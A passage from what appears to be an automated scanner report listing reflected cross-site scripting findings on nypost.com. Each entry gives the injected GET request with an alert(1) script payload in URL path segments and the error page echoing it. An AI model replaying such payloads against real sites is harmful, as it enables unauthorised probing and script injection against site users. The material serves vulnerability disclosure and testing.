Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig7b225<script>alert(1)</script>0d0497a7126/WebPortal/nypost/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.240. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb4cc<script>alert(1)</script>9c3cd6a2728 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalbb4cc<script>alert(1)</script>9c3cd6a2728/nypost/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalbb4cc<script>alert(1)</script>9c3cd6a2728/nypost/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.241. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2f65<script>alert(1)</script>8c80e29cec1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostb2f65<script>alert(1)</script>8c80e29cec1/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostb2f65<script>alert(1)</script>8c80e29cec1/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.242. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8563a<script>alert(1)</script>38ee9ec9c37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks8563a<script>alert(1)</script>38ee9ec9c37/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks8563a<script>alert(1)</script>38ee9ec9c37/media_nav/media_nav.css</p>
...[SNIP]...

1.243. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 336c6<script>alert(1)</script>3bf9820cf40 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/media_nav336c6<script>alert(1)</script>3bf9820cf40/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/media_nav336c6<script>alert(1)</script>3bf9820cf40/media_nav.css</p>
...[SNIP]...

1.244. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 9e777<script>alert(1)</script>06ce6d4472 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css9e777<script>alert(1)</script>06ce6d4472 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css9e777<script>alert(1)</script>06ce6d4472</p>
...[SNIP]...

1.245. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa0dc<script>alert(1)</script>33396eab501 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigfa0dc<script>alert(1)</script>33396eab501/WebPortal/nypost/blocks/most_popular/most_popular.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigfa0dc<script>alert(1)</script>33396eab501/WebPortal/nypost/blocks/most_popular/most_popular.css</p>
...[SNIP]...

1.246. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e40c<script>alert(1)</script>02b54529e86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal9e40c<script>alert(1)</script>02b54529e86/nypost/blocks/most_popular/most_popular.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal9e40c<script>alert(1)</script>02b54529e86/nypost/blocks/most_popular/most_popular.css</p>
...[SNIP]...

1.247. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc5b5<script>alert(1)</script>038729fe8dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostbc5b5<script>alert(1)</script>038729fe8dc/blocks/most_popular/most_popular.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostbc5b5<script>alert(1)</script>038729fe8dc/blocks/most_popular/most_popular.css</p>
...[SNIP]...

1.248. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 10392<script>alert(1)</script>253c624193c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks10392<script>alert(1)</script>253c624193c/most_popular/most_popular.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks10392<script>alert(1)</script>253c624193c/most_popular/most_popular.css</p>
...[SNIP]...

1.249. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9226c<script>alert(1)</script>b8a2d02a74f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/most_popular9226c<script>alert(1)</script>b8a2d02a74f/most_popular.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:16 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/most_popular9226c<script>alert(1)</script>b8a2d02a74f/most_popular.css</p>
...[SNIP]...

1.250. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 5fa52<script>alert(1)</script>b4b42b0ad96 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css5fa52<script>alert(1)</script>b4b42b0ad96 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css5fa52<script>alert(1)</script>b4b42b0ad96</p>
...[SNIP]...

1.251. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 364a1<script>alert(1)</script>da6f5c3280 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig364a1<script>alert(1)</script>da6f5c3280/WebPortal/nypost/blocks/polls/polls.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig364a1<script>alert(1)</script>da6f5c3280/WebPortal/nypost/blocks/polls/polls.css</p>
...[SNIP]...

1.252. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85855<script>alert(1)</script>5fc1451cf0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal85855<script>alert(1)</script>5fc1451cf0d/nypost/blocks/polls/polls.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal85855<script>alert(1)</script>5fc1451cf0d/nypost/blocks/polls/polls.css</p>
...[SNIP]...

1.253. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef1a5<script>alert(1)</script>da66fc38275 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostef1a5<script>alert(1)</script>da66fc38275/blocks/polls/polls.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:16 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostef1a5<script>alert(1)</script>da66fc38275/blocks/polls/polls.css</p>
...[SNIP]...

1.254. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 71370<script>alert(1)</script>d2c3ff1ca29 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks71370<script>alert(1)</script>d2c3ff1ca29/polls/polls.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks71370<script>alert(1)</script>d2c3ff1ca29/polls/polls.css</p>
...[SNIP]...

1.255. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d74c8<script>alert(1)</script>b4951aa17a9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/pollsd74c8<script>alert(1)</script>b4951aa17a9/polls.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/pollsd74c8<script>alert(1)</script>b4951aa17a9/polls.css</p>
...[SNIP]...

1.256. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dd4a6<script>alert(1)</script>ca866cdd848 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.cssdd4a6<script>alert(1)</script>ca866cdd848 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:25 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.cssdd4a6<script>alert(1)</script>ca866cdd848</p>
...[SNIP]...

1.257. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5272f<script>alert(1)</script>54eedcc8a59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig5272f<script>alert(1)</script>54eedcc8a59/WebPortal/nypost/blocks/popup/popup.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
